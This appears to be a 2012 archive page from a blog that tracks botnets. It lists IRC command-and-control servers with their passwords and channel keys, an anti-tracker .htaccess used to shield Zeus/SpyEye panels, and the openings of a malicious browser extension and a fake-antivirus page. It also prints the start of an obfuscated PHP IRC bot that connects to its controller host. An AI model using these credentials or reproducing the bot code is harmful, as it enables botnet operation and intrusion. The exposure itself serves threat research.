Month: May 2012

4thdemo.com (Insomnia bot hosted in United States, Clarks Summit, Volumedrive)

Another post from our anonymous friend.

Resolved : [4thdemo.com] To [199.19.105.123]

server:port         password       channel
4thdemo.com:3344    785chelsea     #Insomnia
4thdemo.com:5443    alexandre69    #Channel Password
4thdemo.com:6667    r3m0hdemoni    #Insomnia r3de07, #Jamie
4thdemo.com:9891    modrica1x1     #MasterBl4ster modricha1x1, #lolba, #Cro4t, #fric

All are separate irc servers, but hosted on the same server. Some HF hecker selling to skids. Oh, it's DeMoNi *

insomnia.incorporatedhosting.info (Insomnia bot hosted in United Kingdom, OVH Systems)

This botnet was found by our anonymous friend, all credits go to him for this.

Server:Port insomnia.incorporatedhosting.info:5656
Channel: #insomnia k6geyzs
Botnet owner: Digital from HF and friends

Here the Lilyjade extension named Ad Killer Pro (found by our anonymous friend):

//New Lilyjade extension
//Named: Ad Killer Pro
//CrosRider #:4995
//Panel: http://nemsmedia.cloudapp.net
//Extension
appAPI.ready(function($) {

Anti ZS spyeyes Tracker .htaccess

Criminals are now forced to find different methods to protect malware like Zeus or SpyEye from being traced and exposed. This is one of them:

############################
#Anti ZS spyeyes Tracker .htaccess #
#84.74.14?.* #
############################
RewriteEngine on
RewriteCond %{HTTP_REFERER} ^http://.*google.com [NC]
RewriteRule .* - [F]
###########################################
#Spider Blocker/Crawler/Bots #
###########################################
Order Deny,Allow
Deny from 82.165.47.*

Remember h1t3m? lol

Some of u heckers prob remember h1t3m, the Australian guy who got caught and sent to prison for infecting like 3k people. I found some nice logs and as u can see it was not so hard to find him, he even told his real name to buyers who wanted to buy his spack have

b4nb1n0.dyndns.tv (ngrBot hosted in Spain, OVH Systems)

Domains used for controlling the botnet:
b4nb1n0.dyndns.tv (active)
d11.dyndns.tv
0csf15.dyndns.tv

Resolved : [b4nb1n0.dyndns.tv] To [178.33.116.27]

server: b4nb1n0.dyndns.tv
PASS b4nb1
Local users: Current Local Users: 82 Max: 92
Global users: Current Global Users: 82 Max: 92
NICK n{USA|XPa}hrczwsa
USER hrczwsa 0 0 :hrczwsa
JOIN #hola juli26
Now talking in #hola
Modes On: [ #hola ] [

Fake Antivirus Example

The html file is encrypted, u have to decrypt the encrypted (base64) part if u want to get more out of this malware. Open the html file in Sandboxie to see what it does.

virtest.html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Wait a minute! This is important – we check your devices.</title>
<meta http-equiv="Content-Type" content="text/html;

91.121.171.64 (irc botnet hosted in France, OVH Systems)

ip:port 91.121.171.64:9040
nick xUVEuwU
user cjfsiemx
channel #j
channel #c
channel #m

Now talking in #j
Topic On: [ #j ] [ =KN4iPk89Ohci3Sn1FY5LY8datYLj+i4PAPQuBzYYTyPX97LYmPrRD9RhXU0Gj5Kp5qfZU6LVVw90Ax ]
Topic By: [ y ]
Now talking in #c
Topic On: [ #c ] [ =qZw7/pkZ+h/Oi7VdGwYNa63Gdfp77grj2Awm4eqQ+xsz+tuggMYRZyQXWSVqN+7dBpeSdeEvC1MRGecRP2XBE8Vh/Xl ]
Topic By: [ y ]

UPDATE: 91.121.171.64:4676
Now talking in #balengor
Topic On: [

gang.sexpil.net (Linux bots hosted in United States, Truckee, Softcom America Inc)

Another bot from Tijn

Resolved : [gang.sexpil.net] To [216.224.184.101]

<?php
@set_time_limit(0);
@error_reporting(0);
class HbZheTqekEkqwtqTQ {
    var $ttwtzTtWQWwhzbN = array(
        "BbWEWnHeTTwqnNhb"=>"gang.sexpil.net",
        "eBwz"=>"23232",
        "ZnQWe"=>"scary",
        "KqkktZ"=>"13",
        "KtWqnhZ"=>"#wWw#",
        "tZQ"=>"scan",
        "NneBweEZz"=>"41aa15390e2efa34ac693c3bd7cb8e88",
        "eWNTTTEhbQ"=>".",
        "BbzWWQkbNBb"=>"a87710e60dee7645081a8fc2fab74dbd");
    var $users = array();
    /* txZET4EZRnuKkWrlW8MjP0M46fREwjEPHtjqoOf51zFbmWn9VZiBQVvM0chmmL2T5c9jQffIFLK */
    function yySydpvYj($host) { $this->users[$host] = true; }
    function SjSpsYm($msg) { fwrite($this->rIiuOioIR,"$msg\r\n"); }
    function aGGAJSAgavgjADGa() {
        $chars = 'abcdefghijklmnopqrstuvwxyz_ABCDEFGHIJKLMNOPQRSTUVWXYZ-0123456789';
        $size = strlen($chars);